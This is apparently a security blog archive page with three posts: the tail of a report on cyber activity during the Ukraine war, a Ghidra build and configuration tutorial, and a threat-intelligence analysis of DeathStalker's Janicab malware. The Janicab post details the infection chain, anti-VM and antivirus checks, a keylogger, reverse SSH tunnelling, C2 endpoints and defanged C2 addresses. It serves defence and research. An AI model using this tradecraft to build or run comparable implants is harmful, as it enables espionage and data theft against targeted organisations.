Back in March, RIAEvangelist, the developer behind the popular npm package “node-ipc”, published modified versions of the software that contained a special functionality if the running systems had a Russian or Belarusian IP address. On such systems, the code would overwrite all files with a heart emoji, additionally deploying the message, WITH-LOVE-FROM-AMERICA.txt, originating in another module created by the same developer. The node-ipc package is quite popular with over 800,000 users worldwide. As is often the case with open-source software, the effect of deploying these modified “node-ipc” versions was not restricted to direct users; other open-source packages, for instance “Vue.js”, which automatically include the latest node-ipc version, amplified the effect.

Packages aimed to be spread in the Russian market did not always lead to destruction of files, some of them contained hidden functionality such as adding a Ukrainian flag to a section of the website of software or political statements in support of the country. In certain cases the functionality of the package is removed and replaced with political notifications. It is worth noting that not all packages had this functionality hidden with some authors announcing the functionality in the package description.

One of the projects encourages to spread a file that once opened will start hitting various pages of the enlisted servers via JavaScript to overload the websites

Other repositories and software modules found on GitHub included those specifically created to DDoS Russian governmental, banking and media sites, network scanners specifically for gathering data about Russian infrastructure and activity and bots aimed at mass reporting of Telegram channels.

Key insights
  • As the conflict drags on, popular open-source packages can be used as a protest or attack platform by developers or hackers alike
  • The impact from such attacks can extend further that the open-source software itself, propagating to other packages that automatically rely on the trojanized code
Fragmentation

During the past years, most notably after 2014, this process began to expand to the IT Security world, with nation states passing laws banning each other’s products, services, and companies.

Following the start of the conflict in Ukraine in February 2022, we have seen a lot of western companies exiting the Russian market and leaving their users in a difficult position when it comes to receiving security updates or support. At the same time, some western nations have pushed laws banning the use of Russian software and services due to a potential risk of these being used to launch attacks.

Obviously, one cannot totally rule out the possibility of political pressure being applied to weaponize products, technologies, and services of some minor market players. When it comes to global market leaders and respected vendors, however, we believe this to be extremely unlikely.

On the other hand, searching for alternative solutions can be extremely complicated. Products from local vendors, whose secure development culture, as we have often found, is usually significantly inferior to that of global leaders, are likely to have “silly” security errors and zero-day vulnerabilities, rendering them easy prey for both cybercriminals and hacktivists.

Should the conflict continue to exacerbate, organizations based in countries where the political situation does not require addressing the above issues, should still consider the future risk factors that may affect everyone:

  • The quality of threat detection decreases as IS developers lose some markets, resulting in the expected loss of some of their qualified IS experts. This is a real risk factor for all security vendors experiencing political pressure.
  • The communication breakdowns between IS developers and researchers located on opposite sides of the new “iron curtain” or even on the same side (due to increased competition on local markets) will undoubtedly decrease the detection rates of security solutions that are currently being developed.
  • Decreasing CTI quality: unfounded politically motivated cyberthreat attribution, exaggerated threats, lower statement validity criteria due to political pressure and in an attempt to utilize the government’s political narrative to earn additional profits.

Government attempts to consolidate information about incidents, threats, and vulnerabilities and to limit access to this information detract from overall awareness, since information may sometimes be kept under wraps without good reason.

Key insights
  • Geopolitics are playing an important role and the process of fragmentation is likely going to expand
  • Security updates are probably the top issue when vendors end support for products or leave the market
  • Replacing established, global leaders with local products might open the doors to cybercriminals exploiting zero-day vulnerabilities
Did a cyberwar happen?

Ever since the beginning of the conflict, the cybersecurity community has debated whether or not what was going on in Ukraine qualifies as “cyberwar”. One indisputable fact, as documented throughout this report, is that significant cyberactivity did take place in conjunction with the start of the conflict in Ukraine. This may be the only criteria we need.

On the other hand, many observers had envisioned that in the case of a conflict, devastating preemptive cyberattacks would cripple the “special operation’d” party. With the notable exception of the Viasat incident, whose actual impact remains hard to evaluate, this simply did not take place. The conflict instead revealed an absence of coordination between cyber- and kinetic forces, and in many ways downgraded cyberoffense to a subordinate role. Ransomware attacks observed in the first weeks of the conflict qualify as distractions at best. Later, when the conflict escalated this November and the Ukrainian infrastructure (energy networks in particular) got explicitly targeted, it is very telling that the Russian military’s tool of choice for the job was missiles, not wipers[2].

If you subscribe to the definition of cyberwar as any kinetic conflict supported through cyber-means, regardless of their tactical or strategic value, then a cyberwar did happen in February 2022. Otherwise, you may be more satisfied with Ciaran Martin‘s qualification of “cyberharassment”[3].

Key insights
  • There is a fundamental impracticality to cyberattacks; an impracticality that can only be justified when stealth matters. When it does not, physical destruction of computers appears to be easier, cheaper, and more reliable.
  • Unless very significant cyberattacks have failed to reach public awareness, at the time of writing this, the relevance of cyberattacks in the context of open war has been vastly overestimated by our community.
Conclusion

The conflict in Ukraine will have a lasting effect on the cybersecurity industry and landscape as a whole. Whether the term “cyberwar” applies or not, there is no denying that the conflict will forever change everyone’s expectations about cyberactivity conducted in wartime, when a major power is involved. Unfortunately, there is a chance that established practice will become the de facto norm.

Before the war broke out, several ongoing multiparty processes (UN’s OEWG and GGE) attempted to establish a consensus on acceptable and responsible behavior in cyberspace. Given the extreme geopolitical tensions we are currently experiencing, it is doubtful that these already difficult discussions will bear fruit in the near future.

A promising initiative in the meantime is the ICRC’s “digital emblem” project: a proposed solution to clearly identify machines used for medical or humanitarian purposes, in the hopes that attackers will refrain from damaging them. Just like the real-life red cross and red crescent emblems cannot stop bullets, digital emblems will not prevent cyberattacks on a technical level – but they will at least make it obvious to everyone that medical infrastructure is not a legitimate target.

As it seems more and more likely that the conflict will drag on for years, and with the death toll already being high… we hope that everyone can at least agree on that.

[1] The point of this section is not to evaluate the accuracy of those numbers, which are self-reported in many cases, but to study how these cyberattacks are used to shape narratives.

[2] This report does not make the assumption that the Russian military would use, could use, or has ever used wiper malware. US-CERT however went on the record on this exact subject. So did a number of industry peers.

[3] We recognize that information about ongoing cyberattacks and their impact isn’t exactly forthcoming. This assessment may be revised at a later date, when more data becomes available.

2022. december 9.

How to train your Ghidra

Getting started with Ghidra

For about two decades, being a reverse engineer meant that you had to master the ultimate disassembly tool, IDA Pro. Over the years, many other tools were created to complement or directly replace it, but only a few succeeded. Then came the era of decompilation, adding even more to the cost and raising the barrier to entry into the RE field.

Then, in 2019, Ghidra was published: a completely open-source and free tool, with a powerful disassembler and a built-in decompiler for each supported platform. However, the first release did not look even close to what us reverse engineers were used to, so many of us tried and then abandoned it.

It may sound anecdotal, but the most popular answer to, “Have you used Ghidra?” I usually hear is, “Yeah, tried it, but I’m used to IDA”, or “I don’t have the time to check it out; maybe later”.  I was like that, too: tried to reverse something, failed miserably, went back to familiar tools. I would still download a newer version every once and then, and try to do some work or play CTF. One day, after making a few improvements to the setup and adding the missing databases, I would not go back.

So, here is my brief introduction to setting up Ghidra, and then configuring it with a familiar UI and shortcuts, so that you would not need to re-learn all the key sequences you have got used to over the years.

Disclaimer

Ghidra is a complex collection of source code with many third-party dependencies that are known to contain security vulnerabilities. There are no guarantees that the current code base is free from those or that it does not contain any backdoors. Proceed with caution, handle with care.

Building Ghidra

Of course, the easiest way to obtain Ghidra is to download the current release published on Github. The current code is months behind the master branch, and will most likely be missing all the latest features. So, although this is not the officially recommended approach, I suggest getting the bleeding-edge code from the master branch and building the binaries yourself. In the meantime, we are going to prepare our own build of the master branch and make it available for download.

So, let us begin. First, you need the following prerequisites:

All OSs:

Additionally, you need the platform-specific compiler for building the native binaries:

  • Windows: Microsoft Visual Studio (2017 or later; 2022 Community edition works well)
  • Linux: modern GNU Compiler Collection (9 and 12 work well)
  • macOS: Xcode build tools

Then, download the latest source code in a ZIP archive and extract it, or clone the official Git repository.

Windows build

Open the command line prompt (CMD.EXE). Set the directory containing the source code as the current one:
cd %directory_of_ghidra_source_code%

Run “bin\gradle.bat” from the Gradle directory to initialize the source tree and download all the dependecies:
gradle.bat -I .\gradle\support\fetchDependencies.gradle init

You need an active Internet connection, and it may take 5–10 minutes to download the dependencies.

In the end, the output should state, “BUILD SUCCESSFUL” and also print clearly that Visual Studio was located (required for further building).

If there were problems, check your Internet connection—provided that you have Visual Studio, JDK and Gradle properly installed. Once the build succeeds, issue the final command:
gradle.bat buildGhidra

It will take more time, you may see lots of warnings printed out, but the final verdict still should be, “BUILD SUCCEESFUL”.

The complete Ghidra package is written as a ZIP archive to the “build\dist” directory. To run Ghidra, extract the ZIP archive and start “ghidraRun.bat”.

At the time of writing this, Ghidra 10.3-DEV used the “Windows” UI configuration as the default one, so there was no need to reconfigure the “look and feel” option.

Linux build

Use an existing terminal window or open a new one.
Set the directory containing the source code as the current one:
cd %directory_of_ghidra_source_code%

Run “bin\gradle” from the Gradle directory to initialize the source tree and download all the dependencies:
gradle -I ./gradle/support/fetchDependencies.gradle init

You need an active Internet connection, and it may take 5–10 minutes to download the dependencies. Please note that the task may fail if your locale is different from “en_US” and GCC uses translated messages:

This may happen, for example, with the Russian locale, because the version string for GCC is translated:

As a mitigation, run gradle prefixed with “LANG=C”:
LANG=C gradle -I ./gradle/support/fetchDependencies.gradle init

In the end, the output should state, “BUILD SUCCESSFUL”.

Then, build Ghidra and all the dependencies:
Gradle buildGhidra

Once the build succeeds, a ZIP archive can be located in the build/dist directory. Extract it from there.

To start Ghidra, use the “ghidraRun” shell script in the root directory of the extracted archive:

At the time of writing this, version 10.3-DEV used the “Nimbus” look and feel as the default:

To use a more familiar look and feel, switch to “Native” or “GTK+” using the “Edit -> Tool Options -> Tool” menu, and choose the relevant item from the “Swing Look And Feel” dropdown list. This is what the “Native” theme looks on Gnome 3:

macOS build

For macOS, you need to have the Xcode command-line tools installed, and that includes a substitute for GCC and make. This can simply be done by opening a Terminal window and running gcc. If the tools are not installed, an installation dialog will appear. Just confirm the installation and wait for the tools to download.

Once the tools are installed, the build process is identical to that in Linux.
Set the directory containing the source code as the current one:
cd %directory_of_ghidra_source_code%

Run “bin\gradle” from the Gradle directory to initialize the source tree and download all the dependencies:
gradle -I ./gradle/support/fetchDependencies.gradle init

Then, start the main build process:
gradle buildGhidra

Unzip the resulting Ghidra package from the build/dist directory and start the “ghidraRun” shell script:

The default look and feel for macOS is native by default:

Setting up the UI

To configure Ghidra, let us first create a temporary project. A project used for storing all the results of the analysis, like an IDB, but for several files (samples) and folders, can also hold type databases that can be shared between different files. It can even be linked to a remote database for collaborative work, but that is far beyond our scope of just setting up.

So, let us use the “File -> New Project…” menu, type in a project name and filesystem location, and continue:

Now, we have an empty project. Let us start the CodeBrowser tool that is the main UI for working with the binaries:

This will open an empty listing window, with a few subwindows inside:

This is going to be the primary workspace in Ghidra, so let us reconfigure it to behave and look a bit closer to what we are used to.

Navigation bar
It is vertical and located on the right side of the listing by the scrollbar. To turn it on, use the “overview” button:

The rest of the options are set in the “Options” window by using the “Edit -> Tool Options…” menu.

Hex editor font
Select the following on the “Options -> ByteViewer” tab:

Hexadecimal offsets in structures
Set the following on the “Options -> Structure Editor” tab:

Shortcuts!
Default shortcuts, or “key bindings”, may be very confusing even for a seasoned reverse engineer and seem to be based on the ones used by Eclipse. You can search for shortcuts of interest and set or change them using a filter. To make the transition easier, we have prepared a prebuilt configuration with familiar shortcuts (C for code, D for data, X for xrefs, Esc for going back, etc.), which you can download from here and import:

Disassembly listing font
Choose the color and font on the “Options -> Listing Display” tab:

Compact listing of array items:
These are called “elements per line” on the “Listing Fields -> Array Options” tab. Also, you may want to change the “Array Index Format” to “hex” to prevent any confusion in the listing.

One line per instruction
To achieve that, set the “maximum lines to display” to “1” in the “Options -> Listing Fields -> Bytes Field” menu. It also makes sense to check “Display in Upper Case”.

Highlight by Left Mouse Click
This is probably the most searched-for option, with the most frustrating defaults. To get values, registers, labels, and anything else highlighted with a left mouse click, set the option “Options -> Listing Fields -> Cursor Text Highlight”, “Mouse Button To Activate” to “LEFT” (the default is “MIDDLE”).

Function headers and footers
Tick the options “Flag Function Entry” and “Flag Function Exits” on the “Options -> Listing Fields -> Format Code” tab.

At the same time, uncheck the “Display Function Label” option on the “Options -> Listing Fields -> Labels Field” tab to remove an unnecessary line for each function header.

Turn off horizontal scrolling
Uncheck this option on the “Options -> Listing Fields -> Mouse” tab:

Show “normal” register names, long arrays, and strings
By default, Ghidra will display local variable names instead of registers. In some cases, this may be useful, but may also cause frustration when trying to read plain assembly.
To force Ghidra to show plain register names, uncheck the “Markup register variable references” option on the “Options -> Listing Fields -> Operands Field” tab.
It may also help to increase the “Maximum Lines to Display” to 200, and to check the “Enable word wrapping” option to make arrays and strings in the listing easier to read.

Increase the number of cross-references to display
This option can be configured on the “Options -> Listing Fields -> XREFs Field” tab:

Change the width of the address, bytes, and opcodes columns
Ghidra uses the concept of “fields” that can be moved around and reformatted via the UI. This UI feature can be activated with the button named “Edit the Listing fields” in the main listing window.

When this is activated, you can move the columns around and change their width. The configuration is saved if you choose “save the tool” when exiting CodeBrowser.

Opening a file for analysis

Now that we have set up the UI, let us start our first analysis. To analyze a file, you need to import it first. This includes copying the data into the database, so that the original file can be deleted from the file system and the imported file can be saved back to disk.

To import a file, use the “File -> Import File…” menu in the Ghidra project window. You will be presented with an import dialog.

To prevent any confusion, treat the “language” as the Ghidra name for a combination of the processor name, byte endianness, and compiler variety. You may need to choose it manually if the file format is not recognized or if there is no format at all.

After the file is imported, it will appear in the project window. From there, you can open it in the CodeBrowser tool to open the main listing window:

For the new files, you will need to start manual analysis tasks or allow the autoanalysis process to do all the usual routine tasks of identifying code, data, functions, etc.:

The default configuration of the “analyzers”, which are separate analysis tasks, should be sufficient in most cases:

The analysis will start, and you will be presented with a CodeBrowser window gradually updating all the information:

Here are a few tips on working with CodeBrowser:

  • The “Symbol Tree” can be used to find all functions, exports including the entrypoint, and imports. Use it to find the starting points of your analysis.
  • The “Data Type Manager” contains all the types, structures, typedefs, pointers, and enums. External type libraries are loaded here, in the “arrow” menu.
  • Use the “Window” menu to discover most of the CodeBrowser functionality.
  • File segments are displayed in the “Memory Map” window. Open it with a button or via the “Window” menu.
Going further

Ghidra comes with a collection of helper scripts in Java and Python that can be located by using the “Script Manager”: use the button or open via the “Window” menu. Also, it has a built-in Python 2—actually, Jython—interactive console. Use the “Window -> Python” menu and discover the flat API using “dir()”:

A few more things

Currently, the vanilla Ghidra build is missing lots of Windows datatypes that are required for typical malware analysis tasks. We have prepared an extended type information database for Windows, and added FIDBs (runtime function signatures) for VS2013 and Delphi. These can be downloaded from here.

This is just the beginning

We hope that this manual will help with reconfiguring Ghidra into a more convenient and easier-to-use tool. With additional type and signature databases, it may become powerful enough for a primary RE tool, while being free and open source. Remember to come back for updates!

2022. december 8.

DeathStalker targets legal entities with new Janicab variant

Just to clarify, the subheading isn’t a normal quote, but a message that Janicab malware attempted to decode in its newest use of YouTube dead-drop resolvers (DDRs).

While hunting for less common Deathstalker intrusions that use the Janicab malware family, we identified a new Janicab variant used in targeting legal entities in the Middle East throughout 2020, possibly active during 2021 and potentially extending an extensive campaign that has been traced back to early 2015 and targeted legal, financial, and travel agencies in the Middle East and Europe.

Janicab was first introduced in 2013 as malware able to run on MacOS and Windows operating systems. The Windows version has a VBscript-based implant as the final stage instead of a C#/PowerShell combo as observed previously in Powersing samples. The VBS-based implant samples we have identified to date have a range of version numbers, meaning it is still in development. Overall, Janicab shows the same functionalities as its counterpart malware families, but instead of downloading several tools later in the intrusion lifecycle as was the case with EVILNUM and Powersing intrusions, the analyzed samples have most of the tools embedded and obfuscated within the dropper.

Interestingly, the threat actor continues to use YouTube, Google+, and WordPress web services as DDRs. However, some of the YouTube links observed are unlisted and go back to 2015, indicating a possible infrastructure reuse.

Law firms and financial institutions continue to be most affected by Deathstalker. However, in the intrusions analyzed recently, we suspect that travel agencies are a new vertical that we haven’t previously seen being targeted by this threat actor.

More information about Deathstalker is available to customers of Kaspersky Intelligence Reporting. Contact us: intelreports@kaspersky.com.

Initial foothold

We determined that the initial infection method using an LNK-based dropper inside a ZIP archive, remained similar to previous campaigns using EVILNUM, Powersing, and PowerPepper, but each seems to focus on different phishing themes, as if each malware family is operated by different teams and/or intended for different types of victims. In a sample Janicab case, the decoy is an industrial corporate profile (hydraulics) matching the subject of a decoy used in previous PowerPepper intrusion. Based on our telemetry, the delivery mechanism remains spear phishing.

MD5 File name File size SID MAC address F1B5675E1A60049C7CD
823EBA93FE977 Corporate Profile Hydraulica.lnk 7.1 MB S-1-5-21-2529457200-
49751210-1696528657-1000 00:50:56:c0:00:08 / VMWare

Decoy document in LNK file

The LNK dropper’s metadata resembles many Powersing and Janicab implants we reported on or publicly analyzed. Namely, the SID, font family, font size, screen buffer and window size, run window, and MAC address are similar.

Despite Janicab and Powersing resembling each other a lot in terms of execution flow and the use of VBE and VBS, their LNKs are structured somewhat differently. In addition, newer Janicab variants have changed significantly in structure compared to older Janicab Windows variants from 2015. The new Janicab variants also embed a CAB archive containing several Python files and other artifacts used later in the intrusion lifecycle. Below is a high-level comparison between Powersing and the new and old Janicab variants.

Powersing

Janicab 1.2.9a

Janicab 1.1.2

LNK files structure comparison

The execution flow

Once a victim is tricked into opening the malicious LNK file, a series of chained malware files are dropped. The LNK file has an embedded “Command Line Arguments” field that aims at extracting and executing an encoded VBScript loader (1.VBE). The latter will drop and execute another embedded and encoded VBScript (2.VBE) that will extract a CAB archive (cab.cab) containing additional resources and Python libraries/tools, and conclude the infection by extracting the last stage – a VBScript-based implant known as Janicab. The final stage will initiate persistence by deploying a new LNK file in the Startup directory and will start communicating with the DDR web services to gather the actual C2 IP address.

Janicab (1.2.9a)

MD5 3f1e0540793d9b9dbd26d6fadceacb71 SHA1 aacd0752289f3b0c6be3fadba368a9a71e46a228 SHA256 33f9780a2f0838e43457a8190616bec9e5489e1a112501e950fc40e0a3b2782e File type Encoded VBE script File size 593 KB File name %userprofile%.VBE

Janicab is a VBS-based malware implant that is mostly similar in functionality to its counterpart malware families, Powersing[1] and EVILNUM[2]. All have basic functionalities such as command execution, importing registry files, and the ability to download additional tools while maintaining persistence with high anti-VM and defense evasion.

Since all three malware families share strong similarities and we have previously analyzed them in respective reports, we will only discuss the interesting differences between Janicab versions in this section.

Janicab can be considered a modular, interpreted-language malware. Meaning the threat actor is able to add/remove functions or embedded files; interpreted-language malware provides such flexibility with reasonably low effort. For example, in older variants, SnapIT.exe, a known tool used to capture screenshots, was embedded, dropped and executed at intervals. This tool was replaced in later variants with other custom-built tools that do the same job. We’ve also seen audio recording capabilities in older variants, but not in later variants.

In newer variants, we started seeing the threat actor embed a DLL-based keylogger or screen capture utility that is invoked using the ‘run_dll_or_py’ function. Interestingly, according to our Kaspersky Threat Attribution Engine (KTAE), the keylogger is very similar to another keylogger used in previous Powersing intrusions we reported on and came under the name ‘AdobeUpdater.dll’. In Powersing intrusions, the DLL was fetched later in the intrusion cycle from a secondary C2 server. However, in Janicab intrusions, it was mostly embedded as a HEX bytes array, or inside CAB files as extra resources. We’re aware of eight different Janicab versions: 1.0.8, 1.1.2, 1.1.4, 1.2.5, 1.2.7, 1.2.8, 1.2.9a, 1.3.2.

Janicab malware evolution

A further comparison of the different Janicab versions shows that additional functions were added throughout the malware development cycle, while specific functions were maintained. For example, the functions below have remained the same from Janicab 1.0.8 up to version 1.3.2:

Function name Brief description function isVmDrivers() Uses driverquery command to check for VMware, Parallels, and VirtualBox function isVmMAC() Checks for a list of 30 MAC addresses prefixes related to virtual environments function isVmProduct() Uses WMI query to check if the target machine has Parallel or VirtualBox “Base Board” Function IPConvert(IPAddress) Convert a decimal number (fetch from DDRs) to dotted decimal format (representing the C2 IP address) function shell_exec(command) Function to execute OS commands Function getPage(url, time, method) Connect to C2 URL over HTTP with GET/POST methods using hidden Internet Explorer instance (called using InternetExplorer.Application) Function MultiByteToBinary(MultiByte) To manipulate embedded data arrays and save them to disk Function Stream_StringToBinary(Text, CharSet) Used to support in base64 encoding

However, the table below shows interesting new functions that were introduced throughout the development of several variants according to the actor’s requirements and/or to evade security controls:

Function name Brief description Function checkRunningProcess() Checks for a list of processes indicating malware analysis or process debugging Function delFFcookies()
Function delGCcookies()
Function delIEcookies() Points to respective browser location and deletes its cookies Function downFile(args) Used to download files from C2 and save them to disk function GetKl(kl) Gets keylogger data, base64 encodes it, then sends it to C2 Function runCmd(cmd, cmdType) Function facilitating command execution using CMD.exe or PowerShell.exe Function run_dll_or_py(arg1, arg2) Used to execute Python or DLL files while using two arguments; arg1 is the DLL path and arg2 is the DLL exported function name (MyDllEntryPoint) function add_to_startup_manager(server, installedAV)
function add_to_startup_reg_import(startupFile, starterFile)
function add_to_startup_shortcut(startupFile, starterFile) Used to register the victim for the first time at the C2; perform persistence actions and install Microsoft Sync Services.lnk in system startup folder and registry HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Function isMalwb() Function to check if MalwareBytes is installed. Similar functions were seen in other variants that check for other AV products Function HandleCCleaner() Checks if CCleaner is installed by checking system registry, and deletes the registry entries accordingly Function RunIeScript() Runs ie.vbe script using CScript.exe to ensure no residual Internet Explorer instances exists after C2 communication uses IE hidden browser Function getAV() Gets a list of installed AV products

Starting with version 1.0.8, Janicab VBS implants had several files embedded in the form of byte arrays. These are usually registry, VBE, PE EXE, or DLL files. In recent samples, while we still see embedded byte arrays for such resources, much of the extra resources were placed inside a CAB archive file that is dropped in the Stage-1 process.

Dropped files:

  • \cab.cab\zipContent\K.dll
  • \cab.cab\zipContent\map.txt
  • \cab.cab\zipContent\replacer.py
  • \cab.cab\zipContent\python\Microsoft.VC90.CRT.manifest
  • \cab.cab\zipContent\python\msvcr90.dll
  • \cab.cab\zipContent\python\python.exe
  • \cab.cab\zipContent\python\python27.dll
  • \cab.cab\zipContent\python\pythoncom27.dll
  • \cab.cab\zipContent\python\pywintypes27.dll
  • \cab.cab\zipContent\python\DLLs\_socket.pyd
  • \cab.cab\zipContent\python\DLLs\select.pyd
  • \cab.cab\zipContent\python\includes\PythonProxy.py
  • \cab.cab\zipContent\python\includes\ftp.py
  • \cab.cab\zipContent\python\includes\junction.exe
  • \cab.cab\zipContent\python\includes\plink.exe
  • \cab.cab\zipContent\python\includes\runner.py
  • \cab.cab\zipContent\python\Lib\<77 python libraries for system, network, and encryption/encoding>

Below are noteworthy dropped files and their descriptions:

Filename Description K.dll Named Stormwind after a directory it creates, it’s a DLL-based keylogger that enumerates system locale, timezone info, and sets a global hook to capture keystrokes. It writes keystrokes with timestamps to a log file named log.log under the \AppData\Roaming\Stormwind directory. It watches for killKL.txt under \AppData\Local\Temp\ReplaceData\ for the keylogger kill switch command. PythonProxy.py An IPv4/IPv6 capable Python-based proxy that is able to relay web traffic between the local target system and remote C2 server.
Support HTTP methods CONNECT, ‘OPTIONS’, ‘GET’, ‘HEAD’, ‘POST’, ‘PUT’, ‘DELETE’, ‘TRACE’ Ftp.py Local FTP Python-based server serving on port 2121 with creds test:test.
Creates directory alias to all existing drives except floppy drive, using Junction.exe (a sysinternals tool). Adds regkey to accept EULA since it’s a sysinternal tool asking for EULA if it’s a first time run. Then serves the “junctioned” local directories to the FTP server. Runner.py A Python script that takes four arguments: remote SSH server, remote SSH port, remote bind port, and “ftp” or “proxy” as application options.
Depending on the argument received for the application option, it runs ftp.py (if ftp in argument) or pythonproxy.py (if proxy in argument).
In both options, the script will start an SSH reverse tunnel to a remote server controlled by the threat actor and use the tunnel as a socks proxy or as a method to browse the local drives initialized previously with a local FTP server.
If the killrunner.txt file is found in %temp%\ReplaceData\, runner.py will exit. Junction.exe It is a sysinternals tool https://docs.microsoft.com/en-us/sysinternals/downloads/junction.
It creates NTFS junction points (aliases); creates the “\\Drives” directory and maps it to the local FTP server created with ftp.py and serves its content. Plink.exe Known Windows-based CLI SSH client for pivoting and tunneling
Referenced by Runner.py for reverse tunneling/file copying. Infrastructure

One of the distinctive features of Deathstalker is its use of DDRs/web services to host an encoded string that is later deciphered by the malware implant. We consistently see YouTube being used as a DDR despite other web service links existing in the malware settings and not being used, such as links to Google+, which was discontinued in April 2019.

An interesting aspect we have noticed recently is the use of unlisted old YouTube links that were used in 2021 intrusions. Historically, an analyst can use search engines and YouTube search features to look up the pattern used in the respective web services. However, since the threat actor uses unlisted old YouTube links, the likelihood of finding the relevant links on YouTube is almost zero. This also effectively allows the threat actor to reuse C2 infrastructure.

Interestingly, old and new Janicab variants are still using identical function declarations for the web services – YouTubeLinks, and continue to use a constant divider in the process of converting the decimal number to backend the C2 IP address. The most recent dividers we have seen in use are 1337 and 5362.

As for the actual C2 IP addresses, we found that two IP addresses (87.120.254[.]100, 87.120.37[.]68) were hosted in the same ASN as the C2s used in PowerPepper intrusions (e.g., PowerPepper C2 87.120.37[.]192) and are based out of Bulgaria.

The protocol in use for C2 communication is HTTP with GET/POST methods, and the backend C2 software is PHP.

IP Janicab version ASN 176.223.165[.]196 1.3.2 47447 TTM – 23M GmbH 87.120.254[.]100 1.2.9a 34224 NETERRA-AS – Neterra Ltd. 87.120.37[.]68 1.1.2 4224 NETERRA-AS – Neterra Ltd.

Janicab 2021 listing of DDRs

Janicab 2015 listing of DDRs

Sample unlisted YouTube DDR used in recent intrusions

While assessing one of the C2 servers, we discovered that the threat actor was hosting and calling an ICMP shell executable from victim machines. The ICMP shell tool named icmpxa.exe is based on an old Github project. The threat actor has compiled icmpsh-s.c (MD5 5F1A9913AEC43A61F0B3AD7B529B397E) while changing some of its content. The uniqueness of this executable (hash and filename), allowed us to pivot and gather other previously unknown C2 servers used by the threat actor. Interestingly, we also found that the same ICMP shell executable was used previously in PowerPepper intrusions, indicating a potential infrastructure overlap between the two malware families.

Since Janicab is a VBS-based malware, C2 commands can be easily derived from the embedded functions. The malware makes use of VBS functions to connect to the C2 server over HTTP GET/POST requests, and to specific PHP pages. Each PHP page provides certain functionality. Since the early versions of Janicab, the PHP pages’ file name remained largely the same and indicates the backend/intended function. However, starting from version 1.1.x, the threat actor started shortening the PHP pages’ file name without changing much of the intended function. The table below summarizes the PHP pages, their old naming, and their potential use:

PHP page Old name Description Status2.php Status.php Checks server status a.php Alive.php Receives beacon data from victim /gid.php?action=add GenerateID.php?action=add If this is a new victim, generates a user ID and registers system profile info in the C2 backend; adding a victim to the database rit.php ReportIT.php Records if a user machine is related to an IT person after assessing if the machine has any of the anti-analysis checks. In old Janicab versions, a message is also sent as (“it guy”) c.php GetCLI.php Provides system commands for execution on the victim machine rs.php ReceiveScreenshot.php Receives screenshot data from the victim rk.php ReceiveKl.php Receives keylogger data from the victim sm.php Startup.php?data= Provides the implant with a suitable method to start its execution flow based on available security controls d.php N/A Downloads saved files from C2 to victim

The affected entities fall within the traditional sphere of Deathstalker targeting; primarily legal and financial investment management (FSI) institutions. However, we have also recorded a potentially new affected industry – travel agencies. The Middle East region and Europe were also seen as a typical workspace for Deathstalker with varying intensity between the countries. Interestingly, this is the first time we have noted legal entities in Saudi Arabia being targeted by this group.

The countries affected by the Janicab intrusions we analyzed are Egypt, Georgia, Saudi Arabia, United Arab Emirates, and the United Kingdom.

Attribution

We assess with high confidence that the intrusions discussed in this report are associated with the Deathstalker threat actor group. The attribution is based on the use of the new Janicab variant, unique TTPs, victimology, and infrastructure used by the threat actor operators. Comparative intrusion analysis between Janicab and Powersing highlights similarities in several phases of the cyber kill chain.

In summary:

  • Same SID and metadata for LNK droppers used in previous Deathstalker intrusions;
  • Similar persistence mechanism between Janicab and Powersing using LNK in the startup folder;
  • Janicab has a similar infection execution flow and uses interpreted-language toolsets such as VBS, VBE, and Python;
  • Janicab macOS and Windows versions have Python file naming similar to EVILNUM malware (e.g., runner.py, serial.txt, etc.);

EVILNUM runner.py for file transfer

Janicab 2021 runner.py snippet for file transfer

Old Janicab for MacOS runner.py for starting background service with file transfer capability

  • The use of Python-based toolset and libraries is common across all Deathstalker intrusions using Janicab, Powersing, EVILNUM, and PowerPepper;
  • The use of YouTube, among other web services/DDRs, is common across Janicab and Powersing intrusions; the method of calling and parsing YouTube and the other DDRs for C2 IP address is almost identical in Janicab, Powersing, and EVILNUM;
  • The identified C2 IPs fall within ASNs seen previously with PowerPepper intrusions;
  • Diverse victimology with a focus on legal and financial institutions, possibly targeted by other hacker-for-hire threat groups;
  • Based on our KTAE similarities engine, the dll (Stormwind) keylogger being used is over 90% similar to an older variant seen in previous Powersing intrusions;
  • Identical code blocks in old/new Janicab and Powersing:
    • Virtual machine detection through processes and virtual MAC addresses; the listing order for the MAC addresses are identical between both malware families, and even between the 2015 and 2021 Janicab versions;
    • Almost identical anti-analysis process detection.

Janicab 2021 virtual MAC address listing

Powersing virtual MAC address listing

Conclusion

Janicab is the oldest malware family being used by Deathstalker. It’s the least publicly known of all malware families the threat actor uses, perhaps because the associated operators have higher OPSEC standards in their practices than their counterparts operating EVILNUM and Powersing. Despite it being an old malware family that dates back to 2013, not much public information has been available on it in recent years and we see that the threat actor kept developing and updating the malware code. The threat actor updated the structure of the LNK droppers and switched the toolset to maintain stealthiness over a long period of time. For example, in older Janicab intrusions, a Windows screenshot tool executable was used to take screenshots, but in later intrusions a DLL-based alternative is used; instead of dropping large tool files from the final VBE stage, it’s now being dropped in Stage-1 as part of a CAB archive.

Based on our telemetry, the threat actor remains focused on the Middle East and Europe as its main area of operation, and shows a lot of interest in compromising legal and financial institutions. Despite that focus, we have historically seen the threat actor targeting other industries in rare situations; travel agencies are an example of this. This once again shows the threat actor is likely a hack-for-hire group with diverse motivation.

Since the threat actor operators continue to use interpreted-language-based malware such as Python, VBE and VBS across their historical and recent intrusions, and largely within their malware families, this can be used to the defenders’ advantage since application whitelisting and OS hardening are effective techniques to block the threat actor’s intrusion attempts. Defenders should also look for Internet Explorer processes running without GUI since Janicab is using IE in hidden mode to communicate with the C2. On the network, the threat actor’s use of a C2 IP address instead of domain names remains a prime method of bypassing DNS-based security controls. Instead, the threat actor is still using DDRs as the method to resolve the C2 IP address; an alternate technique for DNS resolution by using authentic, mostly allowed, public web services that allow C2 communication to blend in with legitimate traffic. This means network defenders can look for frequent visits to the DDR used, followed by HTTP sessions pointing to IP addresses instead of domain names.

Outlook

As legal and financial institutions are a common target for this threat actor, we decided to provide a couple of hypotheses on the potential intent of the adversary (customer/operator), perhaps it provides potential future victims who fall within the affected industries a head start in proactively preparing for such intrusions and/or updating their threat model. All in all, targeting such industries could be seen as temporal to satisfy the adversary’s (customer/operator) needs or intelligence requirements, and as such the intrusions will cease once the legal dispute or intelligence collection task is completed.

Summary of hypotheses for potential intent:

  • H1: legal dispute that involves VIPs
  • H2: legal dispute that involves financial assets
  • H3: blackmailing VIPs
